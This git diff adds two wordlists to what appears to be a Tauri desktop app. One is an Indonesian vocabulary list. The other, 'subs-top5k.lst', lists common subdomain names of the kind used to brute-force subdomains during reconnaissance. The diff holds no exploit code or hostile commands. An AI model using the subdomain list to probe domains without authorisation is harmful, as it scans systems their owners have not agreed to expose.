+bertanya
+antar
+pagar
+mengharapkan
+evaluasi
+sepertinya
+direksi
+dibantu
+menyangkut
+laboratorium
+keberatan
+bunuh
+tergolong
+seharga
+shalat
+disiplin
+macam
+tepi
+dihentikan
+punggung
+berbentuk
+celana
+pesisir
+ketiganya
+memikirkan
+bentrok
+gudang
+kolam
+pemasaran
+lulusan
+pembentukan
+waktunya
+ktp
+gejala
+kadar
+reformasi
+dibahas
+bermula
+perolehan
+melepas
+terpidana
+melatih
+pendiri
+menghormati
+allah
+pantas
+kompasotomotif
+memperkenalkan
+komentar
+semen
+terbanyak
+petinju
+dipasang
+dikonfirmasi
+hartati
+latar
+mendatangkan
+aspek
+menyelidiki
+membunuh
+kisaran
+kewajiban
+enak
+kegagalan
+komoditas
+kerajaan
+pikiran
+melapor
+marah
+gading
+dwi
+otomatis
+terduga
+menceritakan
+pembatasan
+pembina
+memperhatikan
+kekhawatiran
+membicarakan
+sesama
+caranya
+jatah
+inovasi
+semestinya
+mendirikan
+brimob
+vonis
+lemah
+terdengar
+miliknya
+olah
+satpol
+kelebihan
+menjanjikan
+gede
+opsi
+tarian
+bea
+menguntungkan
+goreng
+pendekatan
+lembar
+tandas
+koperasi
+sinar
+diisi
+mengerti
+bawa
+mendengarkan
+hulu
+renang
+merokok
+bersikap
+permai
+menghilangkan
+divonis
+memengaruhi
+aktor
+skala
+momen
+terjun
+dada
+teluk
+bangun
+pasang
+penghasilan
+penjual
+harta
+berniat
+massal
+tertulis
+terbilang
+derajat
+perampok
+idul
+cahaya
+bin
+sewa
+bawang
+lukisan
+kalbar
+bertarung
+tuhan
+mengganti
+adil
+terbuat
+disapa
+diciptakan
+sebagainya
+ditujukan
+diumumkan
+prioritas
+rahasia
+menyerah
+sampang
+seolah
+penegakan
+dpt
+menampung
+finis
+melanda
+kakak
+petang
+mengejutkan
+berharga
+kira
+tuntas
+tunjangan
+warisan
+tunggu
+jurnalis
+trofi
+menghubungi
+kimia
+emosi
+spanduk
+armada
+botol
+elemen
+prima
+struktur
+mengusulkan
+inspektur
+diyakini
+tarik
+penyisihan
+otot
+perencanaan
+oposisi
+mendadak
+gadis
+asam
+terdekat
+suhu
+menduduki
+menanyakan
+pemandangan
+menginap
+keluhan
+memakan
+ingat
+makam
+ayahnya
+pembangkit
+abu
+jurnal
+murid
+mengalir
+banding
+pertamanya
+razia
+mengangkut
+induk
+vokalis
+bocah
+konservasi
+keindahan
+instansi
+berbuat
+kupang
+kehutanan
+kemanusiaan
+lelang
+konsisten
+aksinya
+pangkalan
+rugi
+pesantren
+ditembak
+hangat
+kedokteran
+kesadaran
+diraih
+stabil
+candi
+amat
+jari
+kontak
+bernomor
+relawan
+sertifikat
+golongan
+mendominasi
+mengawasi
+persetujuan
+beda
+terorisme
+merilis
+sastra
+birokrasi
+sayap
+syariah
+memadai
+diajak
+kapolres
+kamu
+abad
+distribusi
+duka
+hidupnya
+sepekan
+dimasukkan
+sekalipun
+stok
+persyaratan
+masukan
+diperhatikan
+paparnya
+rupanya
+rel
+intensif
+kedutaan
+dipercaya
+jeruk
+mempertanyakan
+susah
+kontribusi
+mengundurkan
+bangkit
+adik
+obligasi
+zat
+adu
+persis
+melintasi
+transmigrasi
+mengusung
+kemdikbud
+balap
+sentral
+kelautan
+berlaga
+berkoordinasi
+ditempatkan
+pecah
+diprediksi
+lubang
+kebebasan
+dikelola
+urut
+inci
+tampilan
+dijerat
+potongan
+mengendarai
+fitri
+pembebasan
+kesuksesan
+perseroan
+putus
+analis
+ganja
+tahapan
+berikan
+aceng
+reskrim
+ayu
+menjatuhkan
+suci
+penyerangan
+menembak
+terapi
+memaparkan
+penerapan
+dihadapi
+diganti
+penghuni
+dibentuk
+diangkat
+kue
+evakuasi
+senada
+sekretariat
+ketujuh
+juri
+menyentuh
+seluler
+memerintahkan
+sekjen
+payudara
+ratu
+keperluan
+membahayakan
+individu
+otoritas
+menempuh
+sela
+kemerdekaan
+ceko
+posisinya
+pasifik
+berumur
+tugasnya
+taksi
+menyukai
+peraih
+porsi
+memasak
+patut
+berstatus
+terangnya
+leher
+berjarak
+melebihi
+angkat
+pencapaian
+visi
+peta
+jujur
+kritis
+awak
+cokelat
+mempromosikan
+kenal
+komisioner
+komandan
+tujuannya
+bertahap
+diantaranya
+batubara
+apresiasi
+pengaturan
+ulama
+dijaga
+konsentrasi
+pastikan
+intinya
+merpati
+ikatan
+tiang
+disita
+doa
+selisih
+plaza
+perwira
+membaik
+jenjang
+besarnya
+kerusuhan
+dikembalikan
+tanggapan
+eks
+utamanya
+infeksi
+orangtuanya
+diusung
+dirasakan
+bundaran
+kerjanya
+mendaftar
+halnya
+modus
+menggambarkan
+pidato
+analisis
+mempengaruhi
+dikhawatirkan
+kapolri
+seribu
+mendarat
+pisang
+kebon
+penguatan
+penyalahgunaan
+niat
+seringkali
+jendela
+kenyamanan
+terjatuh
+jasad
+cukai
+abang
+penipuan
+pergantian
+lipat
+muenchen
+akurat
+kepadanya
+santai
+gaun
+bahaya
+eksekusi
+komersial
+bakteri
+prajurit
+menekankan
+berulang
+menyetujui
+sepi
+rumput
+paham
+dicetak
+berwenang
+diproduksi
+dipicu
+sutradara
+pungkasnya
+paten
+menjalin
+sman
+persahabatan
+berkomentar
+pencari
+gembira
+mempelajari
+laba
+semata
+patroli
+melayu
+tempur
+harap
+seragam
+dihasilkan
+perajin
+segi
+jejak
+tur
+memudahkan
+pengendalian
+disimpan
+cari
+didirikan
+aneh
+dengar
+kliennya
+sekelompok
+pengolahan
+penawaran
+konten
+batang
+bibit
+kecenderungan
+murni
+bikin
+fenomena
+reaksi
+kerajinan
+patung
+kunjung
+entah
+biar
+helikopter
+membatasi
+pemda
+sertifikasi
+pengisian
+bertajuk
+berujung
+kaget
+percobaan
+pemakaman
+petinggi
+asuhan
+dimainkan
+tembak
+terlambat
+berkisar
+sayuran
+sungguh
+didapatkan
+meyakinkan
+saleh
+angkasa
+ditampilkan
+kantong
+menghargai
+berpeluang
+tabung
+betapa
+wahid
+nota
+menangis
+berselang
+keliling
+asupan
+ciri
+amanat
+dilarikan
+patah
+harusnya
+cairan
+spesies
+bensin
+prinsip
+hormon
+setinggi
+mengucapkan
+kuda
+gelora
+tenggelam
+tembakau
+jalannya
+populasi
+lengan
+iklim
+mematikan
+pengeluaran
+sambutan
+binatang
+dijalankan
+istirahat
+membiarkan
+diinginkan
+baginya
+tenun
+dipaksa
+dolar
+destinasi
+memperpanjang
+ditingkatkan
+tukar
+panik
+diperbaiki
+nyawa
+lapisan
+korps
+dihukum
+kerabat
+ormas
+mancanegara
+satwa
+koridor
+ditandatangani
+peredaran
+kanada
+konstruksi
+penggeledahan
+sayur
+hunian
+bermanfaat
+haris
+kramat
+irak
+kompol
+giliran
+imigrasi
+silakan
+jero
+berkomunikasi
+pipa
+ditunda
+perkiraan
+selepas
+mengerjakan
+kebersihan
+sentimeter
+palu
+minim
+dibayar
+diputuskan
+waspada
+menara
+penyebabnya
+pengunduran
+bau
+terpenting
+topik
+satelit
+sumbangan
+didominasi
+sesungguhnya
+negosiasi
+jagung
+dijelaskan
+dibiarkan
+pangeran
+capres
+sinyal
+mulia
+sebetulnya
+angkot
+terkadang
+demonstrasi
+aspirasi
+sahabat
+realisasi
+ttu
+nenek
+jatuhnya
+panglima
+kios
+roket
+tugu
+sampaikan
+berpartisipasi
+besaran
+huruf
+rilis
+mengendalikan
+pasaran
+tertawa
+bercerita
+memukul
+depresi
+pembagian
+membatalkan
+muara
+inspirasi
+merawat
+saran
+pemakaian
+meningkatnya
+meksiko
+kondusif
+ayung
+pembelajaran
+ditarik
+istilah
+terkejut
+menutupi
+mimpi
+langit
+praktis
+terpadu
+pencuri
+dikunjungi
+pengambilan
+cerdas
+dilakukannya
+menyamakan
+kemiskinan
+wacana
+diam
+penyerahan
+sekuritas
+setia
+lelah
+kalori
+paruh
+kecantikan
+disesuaikan
+terdaftar
+ditolak
+kemasan
+lembut
+penghitungan
+resolusi
+dibagi
+distrik
+berdua
+menunjuk
+keyakinan
+dirancang
+masakan
+komodo
+serang
+karenanya
+tahunnya
+butir
+paksa
+pengamatan
+web
+sesaat
+kariernya
+motivasi
+rela
+berlokasi
+diproses
+pulih
+berdarah
+meninjau
+salak
+menanam
+pesanan
+intelijen
+saatnya
+krim
+bergantung
+basah
+terjebak
+bendahara
+bangku
+bertentangan
+pura
+menyusun
+dipublikasikan
+kostum
+menelan
+membalas
+alkohol
+kenyataan
+wahyu
+berjualan
+kritik
+tembok
+terjangkau
+pengaduan
+kabel
+baiknya
+diberlakukan
+sumur
+wahana
+maya
+mengantongi
+anjing
+letusan
+percepatan
+koruptor
+silang
+musibah
+kuno
+tercapai
+pentas
+dibakar
+klaim
+peninggalan
+penyaluran
+baterai
+munculnya
+diterbitkan
+elpiji
+dikerjakan
+ucapan
+perhiasan
+demonstran
+menunda
+dirjen
+iya
+kediaman
+mencabut
+penyimpanan
+tersenyum
+telekomunikasi
+hukumnya
+perpanjangan
+dituntut
+simbol
+renovasi
+mengacu
+terlepas
+beralih
+kepengurusan
+logistik
+kreativitas
+kroasia
+kembang
+disetujui
+mengungsi
+menerbitkan
+penataan
+diperkuat
+dituduh
+mesti
+roti
+warta
+tempe
+siaga
+statistik
+disepakati
+membuang
+spesialis
+bingung
+perda
+pengurangan
+melancarkan
+memuaskan
+mempercepat
+beraksi
+terbentuk
+ketegangan
+nikah
+contohnya
+regulasi
+sapaan
+etnis
+meyakini
+irlandia
+tolong
+limbah
+seakan
+pemahaman
+jabatannya
+gang
+spekulasi
+menyebar
+finansial
+menghambat
+masalahnya
+gerai
+timbul
+gambaran
+dipindahkan
+tali
+tebal
+klasik
+berbelanja
+bersatu
+cat
+pemberdayaan
+dermaga
+hancur
+pencucian
+pelatnas
+menentang
+belah
+dasarnya
+penghematan
+bekerjasama
+etape
+sejalan
+tenda
+teater
+kapolsek
+komposisi
+pembuka
+perbelanjaan
+atletico
+kena
+melonjak
+hidangan
+kriteria
+diperbolehkan
+berguna
+berisiko
+pemulihan
+langka
+sentuhan
+pemenangan
+ditargetkan
+terjual
+ojk
+peternakan
+negaranya
+keturunan
+deklarasi
+merencanakan
+diklaim
+konsultan
+ditulis
+prasarana
+transparan
+kesiapan
+frekuensi
+perhitungan
+rahmat
+dihimpun
+disajikan
+tenis
+bayar
+imigran
+membuahkan
+alhasil
+dicapai
+masak
+dinikmati
+katakan
+diubah
+seberat
+nutrisi
+tangannya
+kamboja
+quran
+berkomitmen
+legenda
+memprediksi
+mengawal
+pemainnya
+pembakaran
+mobilnya
+sabar
+segmen
+intervensi
+mengusut
+disusul
+betul
+terbiasa
+menyelenggarakan
+lintasan
+nyeri
+narapidana
+gue
+anggotanya
+kemenpora
+kafe
+jutaan
+rezim
+menantang
+ketakutan
+setiawan
+mengakses
+etik
+minimarket
+meledak
+menyusui
+menjerat
+pegunungan
+kaus
+kacang
+menyingkirkan
+bibir
+antusias
+kurun
+sempit
+kejutan
+seru
+melakoni
+mengecek
+penampilannya
+penundaan
+keterbatasan
+perkantoran
+ialah
+menghubungkan
+sambung
+pemukiman
+mencakup
+memperingati
+mutu
+napi
+diundang
+antisipasi
+tempatnya
+mengemudi
+usahanya
+ketinggalan
+kalian
+ditjen
+pengangguran
+keraton
+rentan
+terobosan
+pemerasan
+pembantu
+ditempuh
+bersyukur
+ikon
+memandang
+berjaga
+dijumpai
+marga
+poundsterling
+susun
+nekat
+rudal
+antikorupsi
+selat
+bervariasi
+gitar
+mencontohkan
+berminat
+didorong
+bersiap
+meneruskan
+akademik
+layaknya
+irjen
+sebutan
+berbahan
+malu
+pelita
+alamat
+profesor
+serangkaian
+paus
+inisiatif
+mendalam
+bertema
+teras
+ibukota
+isinya
+membongkar
+potensial
+pelecehan
+koran
+impian
+apel
+geng
+mendaftarkan
+perlengkapan
+segalanya
+lap
+selandia
+cipta
+otomotif
+memadamkan
+nilainya
+legislatif
+berprestasi
+dikuasai
+pemasyarakatan
+tercipta
+imbuhnya
+kontrol
+mengontrol
+bumbu
+dipecat
+ruhut
+hanyalah
+belgia
+perbuatannya
+bernilai
+pemeriksa
+sedih
+diwarnai
+defisit
+mengutip
+penandatanganan
+menyikapi
+perlahan
+instalasi
+menyajikan
+mengeluhkan
+berkelanjutan
+dimaksudkan
+satgas
+rumor
+dagang
+pukulan
+memunculkan
+sarjana
+perpustakaan
+konfirmasi
+petunjuk
+tabungan
+pisau
+menaklukkan
+wewenang
+berteriak
+memesan
+brigjen
+identifikasi
+pemantauan
+menyesuaikan
+delegasi
+keterampilan
+laju
+pokoknya
+perlakuan
+dibebaskan
+didakwa
+pemasangan
+menelusuri
+pandang
+membacakan
+penanaman
+rehabilitasi
+penutup
+motornya
+judul
+komplek
+dilalui
+gerak
+pengantin
+mangga
+landasan
+tertib
+memuji
+menyumbang
+penyelamatan
+ritel
+aktris
+dibilang
+cetak
+tangki
+sebabnya
+diminati
+produktif
+sendirian
+kawah
+kendali
+berolahraga
+penertiban
+baca
+pesat
+mendalami
+membebaskan
+mutiara
+marak
+rakitan
+barunya
+kompensasi
+seberapa
+menuduh
+berjuluk
+berkeliling
+selera
+berlari
+benteng
+mengecam
+mainan
+bina
+bedah
+sandal
+menindaklanjuti
+pemberontak
+keahlian
+wadah
+memecahkan
+perunggu
+memuat
+dicari
+skema
+berkapasitas
+sampel
+batal
+menuntaskan
+dipandang
+pasca
+graha
+kasusnya
+beristirahat
+pupuk
+berbahasa
+kesatuan
+warganya
+ditandai
+usianya
+berobat
+dikonsumsi
+pungutan
+logam
+imbuh
+cerah
+sembari
+bak
+begini
+berenang
+klubnya
+awan
+mengantar
+penari
+beragama
+syiah
+tanam
+permanen
+ajaran
+sebentar
+sentra
+kasat
+ketersediaan
+pembacaan
+ditinggalkan
+menuai
+ekstasi
+hambatan
+pencalonan
+perdanakusuma
+simpang
+ternama
+coklat
+utuh
+akademi
+soalnya
+reguler
+dikenai
+perindustrian
+maklum
+melukai
+tikus
+ditempati
+konsultasi
+kambing
+debat
+perebutan
+kristen
+menjamu
+kombinasi
+otopsi
+minimnya
+fase
+terwujud
+menyayangkan
+bersejarah
+perihal
+sesekali
+instruksi
+dipengaruhi
+rapi
+penempatan
+dengannya
+membubarkan
+meriah
+ombak
+dievakuasi
+melampaui
+paku
+mengarahkan
+psikologis
+ditunjuk
+menuding
+abadi
+prihatin
+dewa
+duren
+akar
+masuknya
+kasar
+emosional
+kakinya
+sanggup
+makna
+ketemu
+pasangannya
+dihadirkan
+niaga
+atasan
+blues
+skandal
+naga
+buang
+dihuni
+kedalaman
+tani
+dilepas
+memperebutkan
+sigit
+mencurigakan
+secepatnya
+mengantarkan
+diawali
+tragedi
+spesial
+tabrakan
+beber
+halus
+memfasilitasi
+kantornya
+bareng
+terbaiknya
+memotong
+kandung
+musisi
+menyalurkan
+pojok
+beralasan
+sifatnya
+teratas
+etika
+pendanaan
+bertuliskan
+respons
+potong
+advokasi
+penyimpangan
+kebenaran
+kelak
+teguh
+bertolak
+kompetitif
+tionghoa
+korsel
+cucu
+kontraktor
+diselamatkan
+sains
+rampung
+memaksimalkan
+puisi
+mencintai
+lemari
+terendah
+pelakunya
+kreasi
+menyerap
+grasi
+pemanfaatan
+keberangkatan
+bertekad
+komplotan
+sate
+miliki
+aliansi
+fiskal
+menghancurkan
+mengerahkan
+mencatatkan
+mengincar
+varian
+didasarkan
+seluruhnya
+memadati
+memindahkan
+menggandeng
+teori
+atraksi
+demam
+kesaksian
+integritas
+kepedulian
+pengajar
+kepresidenan
+mencalonkan
+naskah
+terjaga
+membiayai
+terendam
+senen
+efisien
+dimakamkan
+komando
+partisipasi
+katolik
+kontainer
+pendukungnya
+puji
+hermawan
+kesal
+pangsa
+dilantik
+mengamati
+korut
+bakat
+primer
+ternak
+sebatas
+satpam
+lunak
+rasio
+pistol
+lokasinya
+maksud
+dinaikkan
+lebanon
+pelestarian
+cincin
+dibicarakan
+diserang
+kebangkitan
+ragu
+pengangkatan
+tumbang
+kenyataannya
+adegan
+arti
+mengawali
+tangkap
+janin
+merekrut
+kayak
+separuh
+melangkah
+sembuh
+penerbitan
+saud
+hidung
+pelemahan
+bersepeda
+menghitung
+dibacakan
+ditunjukkan
+spesifikasi
+dikalahkan
+sifat
+wajahnya
+mengolah
+konsolidasi
+kontraknya
+pelayaran
+sejenis
+disahkan
+lumayan
+penasihat
+kurangnya
+memori
+swadaya
+ekonom
+genangan
+vokal
+merujuk
+kalaupun
+pembicara
+rata
+penyebaran
+membawakan
+pinggang
+kepalanya
+berpasangan
+penarikan
+maraknya
+kaltim
+kediamannya
+informatika
+merancang
+kesepahaman
+pil
+dipersiapkan
+pembawa
+pendemo
+menerangkan
+irama
+triwulan
+penyedia
+halte
+kesimpulan
+rentang
+lebak
+terhitung
+penyediaan
+tanggul
+penginapan
+honorer
+mendapati
+musyawarah
+penentuan
+stabilitas
+berpengalaman
+melestarikan
+membobol
+diarahkan
+pembaca
+curiga
+jaksel
+keramik
+fantastis
+ketahanan
+berganti
+jaga
+akal
+obesitas
+dibagikan
+penyesuaian
+bhakti
+pinang
+diusulkan
+disarankan
+kas
+pengeroyokan
+bergaya
+basis
+purba
+balas
+bangkalan
+lestari
+peledak
+kontingen
+lawannya
+penguasaan
+seumur
+teratur
+mengoleksi
+bakso
+serba
+terpenuhi
+bakti
+prediksi
+kembar
+maut
+membagikan
+berlibur
+eksklusif
+memperjuangkan
+biarkan
+edaran
+bepergian
+kekasih
+diakses
+beraktivitas
+edukasi
+dampaknya
+tersingkir
+mendikbud
+gambir
+bersemangat
+kumuh
+mengapresiasi
+ditemani
+kuarter
+berkekuatan
+harapannya
+percakapan
+diatasi
+menghapus
+lutut
+ruko
+berinvestasi
+emisi
+mohon
+nuansa
+monumen
+merekam
+lamongan
+tinju
+pemilukada
+ijazah
+hemat
+ongkos
+balita
+palang
+tebing
+penasaran
+menaruh
+terhenti
+meneliti
+buktinya
+laku
+dibunuh
+melupakan
+pengerjaan
+memperluas
+wei
+menari
+aksesori
+dekade
+indikator
+pengajuan
+paparan
+harapkan
+menggugat
+mengkritik
+menghantam
+kanannya
+dikarenakan
+sewaktu
+sekedar
+sekolahnya
+berjangka
+partainya
+mengizinkan
+napas
+djarum
+penyandang
+bunyi
+tayangan
+kelelahan
+arsitektur
+centre
+produktivitas
+mengevaluasi
+memangkas
+terlarang
+klinik
+pemukulan
+mengkhawatirkan
+instan
+cacat
+persnya
+finalis
+tercepat
+dioperasikan
+hibah
+sleman
+polemik
+mengeluh
+menyerukan
+bergantian
+kemeja
+matematika
+berterima
+kemitraan
+wapres
+efisiensi
+firman
+mengajarkan
+agresif
+menempel
+mengupayakan
+mengedepankan
+pemantau
+menjangkau
+menggali
+kiriman
+memberantas
+sesudah
+serat
+hubungannya
+penjagaan
+kotor
+kau
+ragam
+saraf
+klien
+walikota
+dialihkan
+pertempuran
+raga
+dibatasi
+babi
+menyanyikan
+kepadatan
+furnitur
+kontrakan
+alergi
+pendatang
+campur
+beri
+menghemat
+pemikiran
+menyimpulkan
+membukukan
+mengindikasikan
+menghilang
+kemampuannya
+pejalan
+gampang
+perizinan
+menyewa
+cina
+kolonel
+dilangsungkan
+penguasa
+sensitif
+mengalihkan
+penyelundupan
+lapor
+konteks
+disaksikan
+dikerahkan
+ekstra
+terulang
+ekspedisi
+pemberitahuan
+hindari
+figur
+diizinkan
+edisi
+pedas
+penyeberangan
+surut
+nabi
+menyisakan
+terbit
+salam
+penggerebekan
+mengkaji
+klarifikasi
+forensik
+kemendikbud
+merosot
+diperkenalkan
+dikirimkan
+prosesi
+peresmian
+konversi
+skenario
+perusakan
+menghibur
+dibuang
+bukannya
+dominan
+menguji
+digantikan
+persalinan
+putrinya
+rawa
+arahan
+legendaris
+hilir
+wujud
+kanal
+gagasan
+asyik
+lonjakan
+dikawal
+pecinta
+lidah
+merata
+pemicu
+cair
+siapapun
+hitung
+keagamaan
+rival
+berkontribusi
+bayangkan
+dendam
+desakan
+dibuktikan
+kedelapan
+lbh
+dipasarkan
+kemudahan
+dipegang
+kontroversi
+memburu
+sperma
+memprotes
+pengangkut
+dilindungi
+menghalangi
+mencukupi
+diolah
+trek
+keributan
+seimbang
+artikel
+tangguh
+gemilang
+berkuasa
+kecurangan
+rumit
+disusun
+dikurangi
+syukur
+penampungan
+mendidik
+sepakan
+petasan
+keseimbangan
+dibatalkan
+berkata
+diberangkatkan
+kejati
+perhatikan
+terbarunya
+kebobolan
+biji
+pesiar
+menemani
+persepsi
+smkn
+tombol
+kependudukan
+sedianya
+sambal
+intensitas
+rajin
+politikus
+drastis
+siswi
+kelayakan
+seekor
+menyulitkan
+ular
+mengabaikan
+menyasar
+mayor
+didatangkan
+membesar
+gencar
+kenangan
+bebek
+helm
+tukas
\ No newline at end of file
diff --git a/src-tauri/wordlists/subs-top5k.lst b/src-tauri/wordlists/subs-top5k.lst
new file mode 100644
index 0000000..d4a8057
--- /dev/null
+++ b/src-tauri/wordlists/subs-top5k.lst
@@ -0,0 +1,5000 @@
+www
+mail
+ns2
+ns1
+ftp
+smtp
+webmail
+autodiscover
+pop
+localhost
+ns3
+imap
+test
+vpn
+sip
+api
+ns
+dev
+pop3
+cdn
+ns4
+m
+portal
+lyncdiscover
+speedtest
+cloud
+wiki
+cpanel
+www2
+admin
+support
+dns2
+git
+blog
+enterpriseenrollment
+enterpriseregistration
+dns1
+autoconfig
+ntp
+mail2
+web
+dns
+email
+zabbix
+docs
+new
+images
+old
+app
+demo
+msoid
+news
+proxy
+monitor
+mx
+chat
+whm
+webdisk
+gitlab
+staging
+crm
+my
+intranet
+backup
+mx1
+cpcontacts
+css
+shop
+cpcalendars
+voip
+forum
+thumbs
+lists
+ns5
+cms
+media
+beta
+content
+grafana
+mx2
+office
+unifi
+cdni
+stats
+helpdesk
+secure
+auth
+video
+mobile
+www3
+uthumbs
+uvideos
+static
+status
+sms
+apps
+login
+tv
+galleries
+home
+calendar
+ldap
+download
+svn
+ca
+info
+moodle
+www1
+img
+meet
+sso
+radius
+nagios
+d
+files
+hosting
+nextcloud
+cacti
+help
+mail1
+link
+mrtg
+go
+relay
+live
+sites
+search
+remote
+db
+cs
+library
+cwp
+dns3
+gw
+smtp2
+test2
+server
+service
+monitoring
+time
+vpn2
+sftp
+wifi
+drive
+matrix
+idp
+services
+alumni
+mail3
+noc
+ns6
+acs
+ipv4
+librenms
+pbx
+survey
+dashboard
+en
+erp
+jobs
+nms
+speed
+data
+lms
+ssl
+billing
+ns0
+radio
+test1
+usa
+ws
+ipv6
+lg
+ip
+ad
+connect
+mysql
+online
+c1
+it
+web1
+ai
+cp
+irc
+ticket
+web2
+archive
+ntp1
+owncloud
+s
+redmine
+stream
+c2
+n8n
+registry
+rt
+store
+c3
+gateway
+netbox
+analytics
+prtg
+sandbox
+bbb
+events
+mx3
+newsletter
+ntp2
+conference
+jira
+log
+pay
+elearning
+owa
+smtp1
+storage
+nas
+s3
+syslog
+vpn1
+a
+ads
+mirror
+c4
+doc
+edu
+panel
+wap
+webmail2
+ftp2
+speedtest2
+maps
+ns01
+start
+cc
+e
+music
+c
+c5
+c6
+c7
+c9
+repo
+streaming
+tools
+c8
+fw
+hotspot
+hr
+lib
+mailadmin
+mm
+partner
+stage
+adm
+c0
+content1
+content2
+content3
+content4
+forms
+phpmyadmin
+ts
+content0
+content5
+content6
+content7
+content8
+content9
+contenta
+iw
+jenkins
+router
+stat
+upload
+wp
+exchange
+ipam
+glpi
+project
+www.test
+central
+digital
+im
+member
+sp
+tech
+testing
+vcenter
+adfs
+alpha
+biblioteca
+catalog
+jabber
+mon
+ms
+zeus
+assets
+bi
+dev2
+payment
+social
+unms
+correo
+i
+legacy
+marketing
+master
+ns02
+openvpn
+s1
+site
+sql
+update
+web3
+www4
+careers
+dns4
+map
+smtp3
+turn
+vault
+vps
+b
+community
+ems
+event
+graylog
+image
+net
+orion
+poczta
+teste
+atlas
+mailing
+repositorio
+ru
+share
+zimbra
+access
+docker
+gmail
+hermes
+hub
+tickets
+mta-sts
+projects
+t
+direct
+forums
+jitsi
+server1
+blogs
+dc
+de
+dl
+fax
+file
+id
+logs
+voice
+es
+lab
+mailman
+nexus
+nl
+tracking
+training
+us
+vc
+www.dev
+gis
+mailhost
+ns7
+redirect
+sentry
+account
+campus
+cm
+eduroam
+host
+isp
+kb
+speedtest1
+xmpp
+code
+fs
+intra
+kms
+mailer
+mdm
+s2
+server2
+x
+av
+business
+dms
+em
+mc
+members
+pm
+report
+ssh
+tn
+virtual
+vm
+bb
+cas
+devel
+extranet
+mars
+prod
+prometheus
+sc
+security
+smokeping
+spam
+st
+stun
+vip
+wordpress
+api2
+ci
+games
+mx4
+p
+portainer
+rss
+sslvpn
+sync
+test3
+abc
+bbs
+english
+in
+kibana
+mms
+n
+nc
+sales
+temp
+ww2
+apply
+corp
+eventos
+feedback
+finance
+gallery
+ha
+monitoramento
+otrs
+push
+reports
+tms
+venus
+admissions
+agenda
+cctv
+click
+cn
+delta
+downloads
+firewall
+flow
+mis
+mta
+photo
+play
+pm-bounces
+preview
+sbc
+sts
+uisp
+vod
+ww
+fr
+internet
+math
+ns8
+promo
+qa
+register
+sec
+transfer
+w
+www5
+1
+acc
+ams
+art
+b2b
+cache
+control
+ds
+dude
+geo
+internal
+international
+mail4
+ps
+rs
+send
+smtp4
+staff
+student
+vpn3
+accounts
+antispam
+customer
+dspace
+education
+g
+l
+lb
+list
+main
+mi
+next
+pl
+post
+qr
+sac
+sistema
+suporte
+user
+aws
+books
+box
+bugs
+dyn
+ec
+gps
+iot
+jp
+links
+m2
+mx01
+pos
+r
+rd
+sip2
+sistemas
+smart
+space
+sport
+top
+track
+tracker
+users
+vdi
+whois
+alex
+apollo
+asterisk
+bot
+cert
+core
+email.mg
+f
+google
+iptv
+max
+me
+meeting
+netflow
+ocs
+orange
+phone
+photos
+pma
+rc
+repository
+sam
+sky
+ss
+www6
+academy
+backend
+cam
+confluence
+cvs
+demo2
+domains
+ezproxy
+faq
+green
+groups
+gw1
+health
+local
+lp
+mattermost
+md
+mt
+pda
+people
+pro
+pt
+reg
+research
+sun
+transparencia
+v
+v2
+videos
+webtest
+www.webmail
+bounce
+calendario
+collabora
+gate
+jupiter
+m1
+mk
+mqtt
+odoo
+opac
+piwik
+red
+rustdesk
+srv
+uptime
+www.blog
+www.mail
+aaa
+acme
+ap
+archives
+backup2
+debian
+game
+gitea
+gw2
+hs
+law
+manage
+matomo
+ml
+mp
+neo
+observium
+outlook
+pass
+portal2
+proxy2
+revistas
+star
+tr
+travel
+weather
+webserver
+wg
+z
+2
+ac
+ar
+cdn1
+cdn2
+ead
+global
+is
+linux
+mailtest
+minecraft
+minio
+network
+ns10
+sa
+sis
+sw
+translate
+w3
+win
+www.forum
+best
+cafe
+dev3
+edge
+mail01
+munin
+ns9
+ojs
+oldmail
+openproject
+pages
+radius2
+relay2
+sd
+server3
+servicedesk
+sg
+uat
+uk
+webapp
+wsus
+ww1
+apple
+book
+build
+club
+conf
+dav
+ddns
+demo1
+design
+dhcp
+eng
+foto
+ftp1
+inventory
+ir
+join
+ldap1
+mail5
+ns11
+obs
+public
+rds
+redcap
+rocket
+soporte
+tm
+wazuh
+wpad
+bs
+bugzilla
+cisco
+covid19
+cr
+db1
+dev1
+dm
+dream
+fm
+free
+gold
+guest
+hello
+iris
+its
+ldap2
+learning
+love
+nova
+onlyoffice
+pan
+pandora
+pi
+pki
+pluto
+print
+sb
+sip1
+software
+sos
+sp1
+web4
+webhost
+wireless
+www.shop
+app2
+ava
+camera
+db2
+developer
+dialin
+fw1
+graph
+horizon
+hosting2
+int
+js
+keycloak
+life
+ma
+mercury
+metrics
+mg
+mkt
+nperf
+omega
+painel
+partners
+password
+pr
+prueba
+test4
+webapps
+works
+123
+a1
+admission
+as
+clients
+ebook
+exam
+facebook
+gp
+hera
+icinga
+ims
+labs
+leo
+loopback
+pmg
+pms
+rdp
+sas
+school
+science
+se
+securemail
+sig
+sss
+stock
+system
+talk
+titan
+tom
+traffic
+tt
+wa
+web01
+webdev
+www.alumni
+amp
+app1
+barracuda
+booking
+cal
+campaign
+cat
+ct
+eco
+happy
+hk
+hrm
+hydra
+iso
+job
+k
+learn
+luna
+moon
+odin
+open
+phoenix
+plesk
+q
+recruit
+shell
+sm
+sol
+sp2
+sv
+sys
+team
+u
+url
+voicemail
+webservice
+webservices
+www.m
+www.portal
+xxx
+4
+bill
+call
+career
+ccc
+chatbot
+china
+cis
+console
+da
+eshop
+eva
+ic
+listas
+loghost
+man
+manager
+metabase
+mktr
+mr
+mx5
+op
+origin
+out
+pabx
+payments
+pc
+pdf
+proxy1
+r2
+radius1
+selfservice
+sk
+sl
+slate-mx
+students
+testweb
+www.support
+zendesk1
+zendesk2
+zendesk3
+zendesk4
+3
+apt
+arch
+ares
+bg
+casa
+client
+cliente
+directory
+dns5
+dvr
+dyndns
+enterprise
+epg
+family
+galaxy
+hp
+ice
+j
+king
+mailbox
+mailserver
+management
+market
+msg
+mx02
+ns12
+one
+os
+ovpn
+ping
+preprod
+proxmox
+pub
+pw
+roundcube
+scm
+sirius
+t1
+testsite
+velocidade
+vms
+vote
+vs
+website
+wmail
+admin2
+ahcdn
+alfa
+android
+base
+blue
+campusvirtual
+deb
+dns01
+domain
+dragon
+eoffice
+ff
+fms
+fwdkim1
+gm
+ia
+io
+ixc
+microsoft
+neptune
+oasis
+oc
+ocean
+ops
+pa
+parking
+pe
+prime
+ra
+ras
+sap
+seo
+servicios
+sgp
+si
+sigma
+smtp01
+sonarqube
+src
+trac
+ts3
+vm1
+web5
+360
+abs
+alerts
+am
+ansible
+aurora
+bms
+config
+courses
+csc
+devops
+diamond
+element
+ess
+flash
+food
+fw2
